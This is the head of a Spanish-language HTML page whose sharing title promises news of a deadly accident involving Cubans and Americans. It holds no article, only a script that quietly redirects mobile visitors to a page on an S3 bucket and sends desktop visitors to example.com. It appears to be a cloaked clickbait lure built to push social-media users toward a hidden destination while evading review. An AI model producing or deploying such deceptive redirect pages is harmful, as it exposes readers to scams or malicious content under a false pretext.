<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Terrible accidente ocurrido esta mañana entre ellos hay cubanos y estadounidenses, Hay muertos y herridos"/>
<meta property="og:image" content="https://content.pancake.vn/1/s1650x1050/fwebp/ac/e5/91/32/2484d1cb52913fd9546170d30459369bf4365b3d25f349c6860d0bd5.jpg"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
	function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }
        if (screen.width <= 720) {
        window.location = "https://cajas00025555.s3.ap-southeast-2.amazonaws.com/jasss4412.html";
    } else {
        window.location = "https://example.com/default_page.html"
    }
</script>
	
